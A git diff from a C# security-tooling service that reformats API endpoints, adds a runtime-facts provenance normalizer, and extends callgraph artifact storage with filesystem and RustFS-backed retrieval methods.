- return Results.Accepted($"/signals/unknowns/{response.SubjectKey}", response);
- }
- catch (UnknownsValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
-}).WithName("SignalsUnknownsIngest");
-
-signalsGroup.MapGet("/unknowns/{subjectKey}", async Task (
- HttpContext context,
- SignalsOptions options,
- string subjectKey,
- IUnknownsRepository repository,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Read, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- if (string.IsNullOrWhiteSpace(subjectKey))
- {
- return Results.BadRequest(new { error = "subjectKey is required." });
- }
-
- var items = await repository.GetBySubjectAsync(subjectKey.Trim(), cancellationToken).ConfigureAwait(false);
- return items.Count == 0 ? Results.NotFound() : Results.Ok(items);
-}).WithName("SignalsUnknownsGet");
-
-signalsGroup.MapPost("/reachability/recompute", async Task (
- HttpContext context,
- SignalsOptions options,
- ReachabilityRecomputeRequest request,
- IReachabilityScoringService scoringService,
- SignalsSealedModeMonitor sealedModeMonitor,
- CancellationToken cancellationToken) =>
-{
- if (!Program.TryAuthorize(context, SignalsPolicies.Admin, options.Authority.AllowAnonymousFallback, out var authFailure))
- {
- return authFailure ?? Results.Unauthorized();
- }
-
- if (!Program.TryEnsureSealedMode(sealedModeMonitor, out var sealedFailure))
- {
- return sealedFailure ?? Results.StatusCode(StatusCodes.Status503ServiceUnavailable);
- }
-
- try
- {
- var fact = await scoringService.RecomputeAsync(request, cancellationToken).ConfigureAwait(false);
- return Results.Ok(new
- {
- fact.Id,
- fact.CallgraphId,
- subject = fact.Subject,
- fact.EntryPoints,
- fact.States,
- fact.ComputedAt
- });
- }
- catch (ReachabilityScoringValidationException ex)
- {
- return Results.BadRequest(new { error = ex.Message });
- }
- catch (ReachabilityCallgraphNotFoundException ex)
- {
- return Results.NotFound(new { error = ex.Message });
- }
-}).WithName("SignalsReachabilityRecompute");
-
app.Run();
@@ -724,11 +753,11 @@ public partial class Program
return false;
}
- internal static void EnsureCallgraphIndexes(IMongoCollection collection)
- {
- ArgumentNullException.ThrowIfNull(collection);
-
- try
+ internal static void EnsureCallgraphIndexes(IMongoCollection collection)
+ {
+ ArgumentNullException.ThrowIfNull(collection);
+
+ try
{
var indexKeys = Builders.IndexKeys
.Ascending(document => document.Component)
@@ -745,78 +774,78 @@ public partial class Program
}
catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
{
- // Index already exists with different options – ignore to keep startup idempotent.
- }
- }
-
- internal static void EnsureReachabilityFactIndexes(IMongoCollection collection)
- {
- ArgumentNullException.ThrowIfNull(collection);
-
- try
- {
- var subjectIndex = new CreateIndexModel(
- Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
- new CreateIndexOptions { Name = "reachability_subject_key_unique", Unique = true });
-
- collection.Indexes.CreateOne(subjectIndex);
-
- var callgraphIndex = new CreateIndexModel(
- Builders.IndexKeys.Ascending(doc => doc.CallgraphId),
- new CreateIndexOptions { Name = "reachability_callgraph_lookup" });
-
- collection.Indexes.CreateOne(callgraphIndex);
- }
- catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
- {
- // Ignore when indexes already exist with different options to keep startup idempotent.
- }
- }
-
- internal static bool TryEnsureSealedMode(SignalsSealedModeMonitor monitor, out IResult? failure)
- {
- if (!monitor.EnforcementEnabled)
- {
- failure = null;
- return true;
- }
-
- if (monitor.IsCompliant(out var reason))
- {
- failure = null;
- return true;
- }
-
- failure = Results.Json(
- new { error = "sealed-mode evidence invalid", reason },
- statusCode: StatusCodes.Status503ServiceUnavailable);
- return false;
- }
-
- internal static void EnsureUnknownsIndexes(IMongoCollection collection)
- {
- ArgumentNullException.ThrowIfNull(collection);
-
- try
- {
- var subjectIndex = new CreateIndexModel(
- Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
- new CreateIndexOptions { Name = "unknowns_subject_lookup" });
-
- var dedupeIndex = new CreateIndexModel(
- Builders.IndexKeys
- .Ascending(doc => doc.SubjectKey)
- .Ascending(doc => doc.SymbolId)
- .Ascending(doc => doc.Purl)
- .Ascending(doc => doc.EdgeFrom)
- .Ascending(doc => doc.EdgeTo),
- new CreateIndexOptions { Name = "unknowns_subject_symbol_edge_unique", Unique = true });
-
- collection.Indexes.CreateMany(new[] { subjectIndex, dedupeIndex });
- }
- catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
- {
- // Ignore to keep startup idempotent when index options differ.
- }
- }
-}
+ // Index already exists with different options – ignore to keep startup idempotent.
+ }
+ }
+
+ internal static void EnsureReachabilityFactIndexes(IMongoCollection collection)
+ {
+ ArgumentNullException.ThrowIfNull(collection);
+
+ try
+ {
+ var subjectIndex = new CreateIndexModel(
+ Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
+ new CreateIndexOptions { Name = "reachability_subject_key_unique", Unique = true });
+
+ collection.Indexes.CreateOne(subjectIndex);
+
+ var callgraphIndex = new CreateIndexModel(
+ Builders.IndexKeys.Ascending(doc => doc.CallgraphId),
+ new CreateIndexOptions { Name = "reachability_callgraph_lookup" });
+
+ collection.Indexes.CreateOne(callgraphIndex);
+ }
+ catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
+ {
+ // Ignore when indexes already exist with different options to keep startup idempotent.
+ }
+ }
+
+ internal static bool TryEnsureSealedMode(SignalsSealedModeMonitor monitor, out IResult? failure)
+ {
+ if (!monitor.EnforcementEnabled)
+ {
+ failure = null;
+ return true;
+ }
+
+ if (monitor.IsCompliant(out var reason))
+ {
+ failure = null;
+ return true;
+ }
+
+ failure = Results.Json(
+ new { error = "sealed-mode evidence invalid", reason },
+ statusCode: StatusCodes.Status503ServiceUnavailable);
+ return false;
+ }
+
+ internal static void EnsureUnknownsIndexes(IMongoCollection collection)
+ {
+ ArgumentNullException.ThrowIfNull(collection);
+
+ try
+ {
+ var subjectIndex = new CreateIndexModel(
+ Builders.IndexKeys.Ascending(doc => doc.SubjectKey),
+ new CreateIndexOptions { Name = "unknowns_subject_lookup" });
+
+ var dedupeIndex = new CreateIndexModel(
+ Builders.IndexKeys
+ .Ascending(doc => doc.SubjectKey)
+ .Ascending(doc => doc.SymbolId)
+ .Ascending(doc => doc.Purl)
+ .Ascending(doc => doc.EdgeFrom)
+ .Ascending(doc => doc.EdgeTo),
+ new CreateIndexOptions { Name = "unknowns_subject_symbol_edge_unique", Unique = true });
+
+ collection.Indexes.CreateMany(new[] { subjectIndex, dedupeIndex });
+ }
+ catch (MongoCommandException ex) when (string.Equals(ex.CodeName, "IndexOptionsConflict", StringComparison.Ordinal))
+ {
+ // Ignore to keep startup idempotent when index options differ.
+ }
+ }
+}
diff --git a/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs b/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs
index 6e5dd0b32..6f992b25c 100644
--- a/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs
+++ b/src/Signals/StellaOps.Signals/Services/RuntimeFactsIngestionService.cs
@@ -17,6 +17,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
private readonly IReachabilityCache cache;
private readonly IEventsPublisher eventsPublisher;
private readonly IReachabilityScoringService scoringService;
+ private readonly IRuntimeFactsProvenanceNormalizer provenanceNormalizer;
private readonly ILogger logger;
public RuntimeFactsIngestionService(
@@ -25,6 +26,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
IReachabilityCache cache,
IEventsPublisher eventsPublisher,
IReachabilityScoringService scoringService,
+ IRuntimeFactsProvenanceNormalizer provenanceNormalizer,
ILogger logger)
{
this.factRepository = factRepository ?? throw new ArgumentNullException(nameof(factRepository));
@@ -32,6 +34,7 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
this.cache = cache ?? throw new ArgumentNullException(nameof(cache));
this.eventsPublisher = eventsPublisher ?? throw new ArgumentNullException(nameof(eventsPublisher));
this.scoringService = scoringService ?? throw new ArgumentNullException(nameof(scoringService));
+ this.provenanceNormalizer = provenanceNormalizer ?? throw new ArgumentNullException(nameof(provenanceNormalizer));
this.logger = logger ?? NullLogger.Instance;
}
@@ -62,6 +65,14 @@ public sealed class RuntimeFactsIngestionService : IRuntimeFactsIngestionService
document.Metadata["provenance.ingestedAt"] = document.ComputedAt.ToString("O");
document.Metadata["provenance.callgraphId"] = request.CallgraphId;
+ // Populate context_facts with AOC provenance (SIGNALS-24-003)
+ document.ContextFacts = provenanceNormalizer.CreateContextFacts(
+ request.Events,
+ request.Subject,
+ request.CallgraphId,
+ request.Metadata,
+ document.ComputedAt);
+
var persisted = await factRepository.UpsertAsync(document, cancellationToken).ConfigureAwait(false);
await cache.SetAsync(persisted, cancellationToken).ConfigureAwait(false);
await eventsPublisher.PublishFactUpdatedAsync(persisted, cancellationToken).ConfigureAwait(false);
diff --git a/src/Signals/StellaOps.Signals/Services/RuntimeFactsProvenanceNormalizer.cs b/src/Signals/StellaOps.Signals/Services/RuntimeFactsProvenanceNormalizer.cs
new file mode 100644
index 000000000..926b2cd4d
--- /dev/null
+++ b/src/Signals/StellaOps.Signals/Services/RuntimeFactsProvenanceNormalizer.cs
@@ -0,0 +1,385 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using StellaOps.Signals.Models;
+
+namespace StellaOps.Signals.Services;
+
+///
+/// Normalizes runtime fact events into AOC provenance records per SIGNALS-24-003.
+/// Converts process, socket, and container metadata to format.
+///
+public interface IRuntimeFactsProvenanceNormalizer
+{
+ ///
+ /// Normalizes runtime fact events into a provenance feed.
+ ///
+ ProvenanceFeed NormalizeToFeed(
+ IEnumerable events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary? metadata,
+ DateTimeOffset generatedAt);
+
+ ///
+ /// Creates or updates context facts from runtime events.
+ ///
+ ContextFacts CreateContextFacts(
+ IEnumerable events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary? metadata,
+ DateTimeOffset timestamp);
+}
+
+///
+/// Default implementation of runtime facts provenance normalizer.
+///
+public sealed class RuntimeFactsProvenanceNormalizer : IRuntimeFactsProvenanceNormalizer
+{
+ private const string SourceService = "signals-runtime-ingestion";
+ private const double DefaultConfidence = 0.95;
+
+ public ProvenanceFeed NormalizeToFeed(
+ IEnumerable events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary? metadata,
+ DateTimeOffset generatedAt)
+ {
+ ArgumentNullException.ThrowIfNull(events);
+ ArgumentNullException.ThrowIfNull(subject);
+
+ var eventsList = events.Where(e => e is not null && !string.IsNullOrWhiteSpace(e.SymbolId)).ToList();
+ var records = new List(eventsList.Count);
+
+ foreach (var evt in eventsList)
+ {
+ var record = NormalizeEvent(evt, subject, callgraphId, generatedAt);
+ if (record is not null)
+ {
+ records.Add(record);
+ }
+ }
+
+ var feedMetadata = new Dictionary(StringComparer.Ordinal)
+ {
+ ["aoc.version"] = "1",
+ ["aoc.contract"] = "SGSI0101",
+ ["callgraphId"] = callgraphId,
+ ["subjectKey"] = subject.ToSubjectKey()
+ };
+
+ if (metadata is not null)
+ {
+ foreach (var (key, value) in metadata)
+ {
+ feedMetadata[$"request.{key}"] = value;
+ }
+ }
+
+ return new ProvenanceFeed
+ {
+ SchemaVersion = ProvenanceFeed.CurrentSchemaVersion,
+ FeedId = Guid.NewGuid().ToString("D"),
+ FeedType = ProvenanceFeedType.RuntimeFacts,
+ GeneratedAt = generatedAt,
+ SourceService = SourceService,
+ CorrelationId = callgraphId,
+ Records = records,
+ Metadata = feedMetadata
+ };
+ }
+
+ public ContextFacts CreateContextFacts(
+ IEnumerable events,
+ ReachabilitySubject subject,
+ string callgraphId,
+ Dictionary? metadata,
+ DateTimeOffset timestamp)
+ {
+ var feed = NormalizeToFeed(events, subject, callgraphId, metadata, timestamp);
+
+ return new ContextFacts
+ {
+ Provenance = feed,
+ LastUpdatedAt = timestamp,
+ RecordCount = feed.Records.Count
+ };
+ }
+
+ private static ProvenanceRecord? NormalizeEvent(
+ RuntimeFactEvent evt,
+ ReachabilitySubject subject,
+ string callgraphId,
+ DateTimeOffset generatedAt)
+ {
+ if (string.IsNullOrWhiteSpace(evt.SymbolId))
+ {
+ return null;
+ }
+
+ var recordType = DetermineRecordType(evt);
+ var subjectType = DetermineSubjectType(evt, subject);
+
+ var provenanceSubject = new ProvenanceSubject
+ {
+ Type = subjectType,
+ Identifier = BuildSubjectIdentifier(evt, subject),
+ Digest = NormalizeDigest(evt.SymbolDigest),
+ Namespace = ExtractNamespace(evt.ContainerId, subject)
+ };
+
+ var facts = new RuntimeProvenanceFacts
+ {
+ SymbolId = evt.SymbolId.Trim(),
+ ProcessName = Normalize(evt.ProcessName),
+ ProcessId = evt.ProcessId,
+ SocketAddress = Normalize(evt.SocketAddress),
+ ContainerId = Normalize(evt.ContainerId),
+ HitCount = Math.Max(evt.HitCount, 1),
+ Purl = Normalize(evt.Purl),
+ CodeId = Normalize(evt.CodeId),
+ BuildId = Normalize(evt.BuildId),
+ LoaderBase = Normalize(evt.LoaderBase),
+ Metadata = evt.Metadata
+ };
+
+ var evidence = BuildEvidence(evt);
+
+ return new ProvenanceRecord
+ {
+ RecordId = Guid.NewGuid().ToString("D"),
+ RecordType = recordType,
+ Subject = provenanceSubject,
+ OccurredAt = evt.ObservedAt ?? generatedAt,
+ ObservedBy = DetermineObserver(evt),
+ Confidence = ComputeConfidence(evt),
+ Facts = facts,
+ Evidence = evidence
+ };
+ }
+
+ private static string DetermineRecordType(RuntimeFactEvent evt)
+ {
+ // Determine record type based on available metadata
+ if (!string.IsNullOrWhiteSpace(evt.ProcessName) || evt.ProcessId.HasValue)
+ {
+ return "runtime.process.observed";
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.SocketAddress))
+ {
+ return "runtime.network.connection";
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return "runtime.container.activity";
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.Purl))
+ {
+ return "runtime.package.loaded";
+ }
+
+ return "runtime.symbol.invoked";
+ }
+
+ private static ProvenanceSubjectType DetermineSubjectType(RuntimeFactEvent evt, ReachabilitySubject subject)
+ {
+ // Priority: container > process > package > file
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return ProvenanceSubjectType.Container;
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ProcessName) || evt.ProcessId.HasValue)
+ {
+ return ProvenanceSubjectType.Process;
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.Purl))
+ {
+ return ProvenanceSubjectType.Package;
+ }
+
+ if (!string.IsNullOrWhiteSpace(subject.ImageDigest))
+ {
+ return ProvenanceSubjectType.Image;
+ }
+
+ return ProvenanceSubjectType.Package;
+ }
+
+ private static string BuildSubjectIdentifier(RuntimeFactEvent evt, ReachabilitySubject subject)
+ {
+ // Build identifier based on available data
+ if (!string.IsNullOrWhiteSpace(evt.Purl))
+ {
+ return evt.Purl.Trim();
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return evt.ContainerId.Trim();
+ }
+
+ if (!string.IsNullOrWhiteSpace(subject.ImageDigest))
+ {
+ return subject.ImageDigest;
+ }
+
+ if (!string.IsNullOrWhiteSpace(subject.Component))
+ {
+ return string.IsNullOrWhiteSpace(subject.Version)
+ ? subject.Component
+ : $"{subject.Component}@{subject.Version}";
+ }
+
+ return evt.SymbolId.Trim();
+ }
+
+ private static string? NormalizeDigest(string? digest)
+ {
+ if (string.IsNullOrWhiteSpace(digest))
+ {
+ return null;
+ }
+
+ var trimmed = digest.Trim();
+
+ // Ensure sha256: prefix for valid hex digests
+ if (trimmed.StartsWith("sha256:", StringComparison.OrdinalIgnoreCase))
+ {
+ return trimmed.ToLowerInvariant();
+ }
+
+ // If it looks like a hex digest (64 chars), add prefix
+ if (trimmed.Length == 64 && IsHexString(trimmed))
+ {
+ return $"sha256:{trimmed.ToLowerInvariant()}";
+ }
+
+ return trimmed;
+ }
+
+ private static bool IsHexString(string value)
+ {
+ foreach (var c in value)
+ {
+ if (!((c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') || (c >= 'A' && c <= 'F')))
+ {
+ return false;
+ }
+ }
+ return true;
+ }
+
+ private static string? ExtractNamespace(string? containerId, ReachabilitySubject subject)
+ {
+ // Try to extract namespace from container ID or subject metadata
+ if (!string.IsNullOrWhiteSpace(containerId) && containerId.Contains('/'))
+ {
+ var parts = containerId.Split('/');
+ if (parts.Length > 1)
+ {
+ return parts[0];
+ }
+ }
+
+ return null;
+ }
+
+ private static RecordEvidence? BuildEvidence(RuntimeFactEvent evt)
+ {
+ if (string.IsNullOrWhiteSpace(evt.EvidenceUri) && string.IsNullOrWhiteSpace(evt.SymbolDigest))
+ {
+ return null;
+ }
+
+ var captureMethod = DetermineCaptureMethod(evt);
+
+ return new RecordEvidence
+ {
+ SourceDigest = NormalizeDigest(evt.SymbolDigest),
+ CaptureMethod = captureMethod,
+ RawDataRef = Normalize(evt.EvidenceUri)
+ };
+ }
+
+ private static EvidenceCaptureMethod? DetermineCaptureMethod(RuntimeFactEvent evt)
+ {
+ // Infer capture method from event metadata
+ if (evt.Metadata is not null)
+ {
+ if (evt.Metadata.TryGetValue("captureMethod", out var method) && !string.IsNullOrWhiteSpace(method))
+ {
+ return method.ToUpperInvariant() switch
+ {
+ "EBPF" => EvidenceCaptureMethod.EBpf,
+ "PROC_SCAN" => EvidenceCaptureMethod.ProcScan,
+ "API_CALL" => EvidenceCaptureMethod.ApiCall,
+ "LOG_ANALYSIS" => EvidenceCaptureMethod.LogAnalysis,
+ "STATIC_ANALYSIS" => EvidenceCaptureMethod.StaticAnalysis,
+ _ => null
+ };
+ }
+ }
+
+ // Default based on available data
+ if (evt.ProcessId.HasValue || !string.IsNullOrWhiteSpace(evt.ProcessName))
+ {
+ return EvidenceCaptureMethod.ProcScan;
+ }
+
+ return EvidenceCaptureMethod.ApiCall;
+ }
+
+ private static string? DetermineObserver(RuntimeFactEvent evt)
+ {
+ if (evt.Metadata is not null && evt.Metadata.TryGetValue("observer", out var observer))
+ {
+ return Normalize(observer);
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.ContainerId))
+ {
+ return "container-runtime-agent";
+ }
+
+ if (evt.ProcessId.HasValue)
+ {
+ return "process-monitor-agent";
+ }
+
+ return "signals-ingestion";
+ }
+
+ private static double ComputeConfidence(RuntimeFactEvent evt)
+ {
+ // Base confidence
+ var confidence = DefaultConfidence;
+
+ // Adjust based on available evidence
+ if (!string.IsNullOrWhiteSpace(evt.SymbolDigest))
+ {
+ confidence = Math.Min(confidence + 0.02, 1.0);
+ }
+
+ if (!string.IsNullOrWhiteSpace(evt.EvidenceUri))
+ {
+ confidence = Math.Min(confidence + 0.01, 1.0);
+ }
+
+ if (evt.ProcessId.HasValue && !string.IsNullOrWhiteSpace(evt.ProcessName))
+ {
+ confidence = Math.Min(confidence + 0.01, 1.0);
+ }
+
+ return Math.Round(confidence, 2);
+ }
+
+ private static string? Normalize(string? value) =>
+ string.IsNullOrWhiteSpace(value) ? null : value.Trim();
+}
diff --git a/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs b/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs
index 0d00b2aca..a626a36e3 100644
--- a/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs
+++ b/src/Signals/StellaOps.Signals/Storage/FileSystemCallgraphArtifactStore.cs
@@ -1,46 +1,48 @@
-using System;
-using System.Globalization;
-using System.IO;
-using System.Threading;
-using System.Threading.Tasks;
-using Microsoft.Extensions.Logging;
-using Microsoft.Extensions.Options;
-using StellaOps.Signals.Options;
-using StellaOps.Signals.Storage.Models;
-
-namespace StellaOps.Signals.Storage;
-
-///
-/// Stores callgraph artifacts on the local filesystem.
-///
-internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
-{
- private readonly SignalsArtifactStorageOptions storageOptions;
- private readonly ILogger logger;
-
- public FileSystemCallgraphArtifactStore(IOptions options, ILogger logger)
- {
- ArgumentNullException.ThrowIfNull(options);
- storageOptions = options.Value.Storage;
- this.logger = logger ?? throw new ArgumentNullException(nameof(logger));
- }
-
+using System;
+using System.IO;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Extensions.Logging;
+using Microsoft.Extensions.Options;
+using StellaOps.Signals.Options;
+using StellaOps.Signals.Storage.Models;
+
+namespace StellaOps.Signals.Storage;
+
+///
+/// Stores callgraph artifacts on the local filesystem.
+///
+internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
+{
+ private const string DefaultFileName = "callgraph.json";
+ private const string ManifestFileName = "manifest.json";
+
+ private readonly SignalsArtifactStorageOptions _storageOptions;
+ private readonly ILogger _logger;
+
+ public FileSystemCallgraphArtifactStore(IOptions options, ILogger logger)
+ {
+ ArgumentNullException.ThrowIfNull(options);
+ _storageOptions = options.Value.Storage;
+ _logger = logger ?? throw new ArgumentNullException(nameof(logger));
+ }
+
public async Task SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken)
{
ArgumentNullException.ThrowIfNull(request);
ArgumentNullException.ThrowIfNull(content);
- var root = storageOptions.RootPath;
- var hash = request.Hash?.Trim().ToLowerInvariant();
+ var root = _storageOptions.RootPath;
+ var hash = NormalizeHash(request.Hash);
if (string.IsNullOrWhiteSpace(hash))
{
throw new InvalidOperationException("Callgraph artifact hash is required for CAS storage.");
}
- var casDirectory = Path.Combine(root, "cas", "reachability", "graphs", hash.Substring(0, Math.Min(hash.Length, 2)), hash);
+ var casDirectory = GetCasDirectory(hash);
Directory.CreateDirectory(casDirectory);
- var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? "callgraph.json" : request.FileName);
+ var fileName = SanitizeFileName(string.IsNullOrWhiteSpace(request.FileName) ? DefaultFileName : request.FileName);
var destinationPath = Path.Combine(casDirectory, fileName);
await using (var fileStream = File.Create(destinationPath))
@@ -48,7 +50,7 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
await content.CopyToAsync(fileStream, cancellationToken).ConfigureAwait(false);
}
- var manifestPath = Path.Combine(casDirectory, "manifest.json");
+ var manifestPath = Path.Combine(casDirectory, ManifestFileName);
if (request.ManifestContent != null)
{
await using var manifestStream = File.Create(manifestPath);
@@ -61,7 +63,7 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
}
var fileInfo = new FileInfo(destinationPath);
- logger.LogInformation("Stored callgraph artifact at {Path} (length={Length}).", destinationPath, fileInfo.Length);
+ _logger.LogInformation("Stored callgraph artifact at {Path} (length={Length}).", destinationPath, fileInfo.Length);
return new StoredCallgraphArtifact(
Path.GetRelativePath(root, destinationPath),
@@ -73,6 +75,88 @@ internal sealed class FileSystemCallgraphArtifactStore : ICallgraphArtifactStore
$"cas://reachability/graphs/{hash}/manifest");
}
+ public Task GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return Task.FromResult(null);
+ }
+
+ var casDirectory = GetCasDirectory(normalizedHash);
+ var targetFileName = SanitizeFileName(string.IsNullOrWhiteSpace(fileName) ? DefaultFileName : fileName);
+ var filePath = Path.Combine(casDirectory, targetFileName);
+
+ if (!File.Exists(filePath))
+ {
+ _logger.LogDebug("Callgraph artifact {Hash}/{FileName} not found at {Path}.", normalizedHash, targetFileName, filePath);
+ return Task.FromResult(null);
+ }
+
+ var content = new MemoryStream();
+ using (var fileStream = File.OpenRead(filePath))
+ {
+ fileStream.CopyTo(content);
+ }
+
+ content.Position = 0;
+ _logger.LogDebug("Retrieved callgraph artifact {Hash}/{FileName} from {Path}.", normalizedHash, targetFileName, filePath);
+ return Task.FromResult(content);
+ }
+
+ public Task GetManifestAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return Task.FromResult(null);
+ }
+
+ var casDirectory = GetCasDirectory(normalizedHash);
+ var manifestPath = Path.Combine(casDirectory, ManifestFileName);
+
+ if (!File.Exists(manifestPath))
+ {
+ _logger.LogDebug("Callgraph manifest for {Hash} not found at {Path}.", normalizedHash, manifestPath);
+ return Task.FromResult(null);
+ }
+
+ var content = new MemoryStream();
+ using (var fileStream = File.OpenRead(manifestPath))
+ {
+ fileStream.CopyTo(content);
+ }
+
+ content.Position = 0;
+ _logger.LogDebug("Retrieved callgraph manifest for {Hash} from {Path}.", normalizedHash, manifestPath);
+ return Task.FromResult(content);
+ }
+
+ public Task ExistsAsync(string hash, CancellationToken cancellationToken = default)
+ {
+ var normalizedHash = NormalizeHash(hash);
+ if (string.IsNullOrWhiteSpace(normalizedHash))
+ {
+ return Task.FromResult(false);
+ }
+
+ var casDirectory = GetCasDirectory(normalizedHash);
+ var defaultPath = Path.Combine(casDirectory, DefaultFileName);
+ var exists = File.Exists(defaultPath);
+
+ _logger.LogDebug("Callgraph artifact {Hash} exists={Exists} at {Path}.", normalizedHash, exists, defaultPath);
+ return Task.FromResult(exists);
+ }
+
+ private string GetCasDirectory(string hash)
+ {
+ var prefix = hash.Length >= 2 ? hash[..2] : hash;
+ return Path.Combine(_storageOptions.RootPath, "cas", "reachability", "graphs", prefix, hash);
+ }
+
+ private static string? NormalizeHash(string? hash)
+ => hash?.Trim().ToLowerInvariant();
+
private static string SanitizeFileName(string value)
=> string.Join('_', value.Split(Path.GetInvalidFileNameChars(), StringSplitOptions.RemoveEmptyEntries | StringSplitOptions.TrimEntries)).ToLowerInvariant();
}
diff --git a/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs b/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs
index d38c24239..54596112b 100644
--- a/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs
+++ b/src/Signals/StellaOps.Signals/Storage/ICallgraphArtifactStore.cs
@@ -6,9 +6,41 @@ using StellaOps.Signals.Storage.Models;
namespace StellaOps.Signals.Storage;
///
-/// Persists raw callgraph artifacts.
+/// Persists and retrieves raw callgraph artifacts from content-addressable storage.
///
public interface ICallgraphArtifactStore
{
+ ///
+ /// Stores a callgraph artifact.
+ ///
+ /// Metadata about the artifact to store.
+ /// The artifact content stream.
+ /// Cancellation token.
+ /// Information about the stored artifact.
Task SaveAsync(CallgraphArtifactSaveRequest request, Stream content, CancellationToken cancellationToken);
+
+ ///
+ /// Retrieves a callgraph artifact by its hash.
+ ///
+ /// The SHA-256 hash of the artifact.
+ /// Optional file name (defaults to callgraph.json).
+ /// Cancellation token.
+ /// The artifact content stream, or null if not found.
+ Task GetAsync(string hash, string? fileName = null, CancellationToken cancellationToken = default);
+
+ ///
+ /// Retrieves a callgraph manifest by artifact hash.
+ ///
+ /// The SHA-256 hash of the artifact.
+ /// Cancellation token.
+ /// The manifest content stream, or null if not found.
+ Task GetManifestAsync(string hash, CancellationToken cancellationToken = default);
+
+ ///
+ /// Checks if an artifact exists.
+ ///
+ /// The SHA-256 hash of the artifact.
+ /// Cancellation token.
+ /// True if the artifact exists.
+ Task ExistsAsync(string hash, CancellationToken cancellationToken = default);
}
diff --git a/src/Signals/StellaOps.Signals/Storage/RustFsCallgraphArtifactStore.cs b/src/Signals/StellaOps.Signals/Storage/RustFsCallgraphArtifactStore.cs
new file mode 100644
index 000000000..97ae429fc
--- /dev/null
+++ b/src/Signals/StellaOps.Signals/Storage/RustFsCallgraphArtifactStore.cs
@@ -0,0 +1,333 @@
+using System;
+using System.Globalization;
+using System.IO;
+using System.Linq;
+using System.Net;
+using System.Net.Http;
+using System.Net.Http.Headers;
+using System.Text;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Extensions.Logging;
+using Microsoft.Extensions.Options;
+using StellaOps.Signals.Options;
+using StellaOps.Signals.Storage.Models;
+
+namespace StellaOps.Signals.Storage;
+
+///
+/// Stores callgraph artifacts in RustFS (S3-compatible content-addressable storage).
+///
+internal sealed class RustFsCallgraphArtifactStore : ICallgraphArtifactStore
+{
+ internal const string HttpClientName = "signals-storage-rustfs";
+
+ private const string DefaultFileName = "callgraph.json";
+ private const string ManifestFileName = "manifest.json";
+ private const string ImmutableHeader = "X-RustFS-Immutable";
+ private const string RetainSecondsHeader = "X-RustFS-Retain-Seconds";
+ private static readonly MediaTypeHeaderValue OctetStream = new("application/octet-stream");
+
+ ///
+ /// Default retention for callgraph artifacts (90 days per CAS contract).
+ ///
+ private static readonly TimeSpan DefaultRetention = TimeSpan.FromDays(90);
+
+ private readonly IHttpClientFactory _httpClientFactory;
+ private readonly SignalsArtifactStorageOptions _storageOptions;
+ private readonly ILogger _logger;
+
+ public RustFsCallgraphArtifactStore(
+ IHttpClientFactory httpClientFactory,
+ IOptions options,
+ ILogger logger)
+ {
+ _httpClientFactory = httpClientFactory ?? throw new ArgumentNullException(nameof(httpClientFactory));
+ ArgumentNullException.ThrowIfNull(options);
+ _storageOptions = options.Value.Storage;
+ _logger = logger ?? throw new ArgumentNullException(nameof(logger));
+ }
+
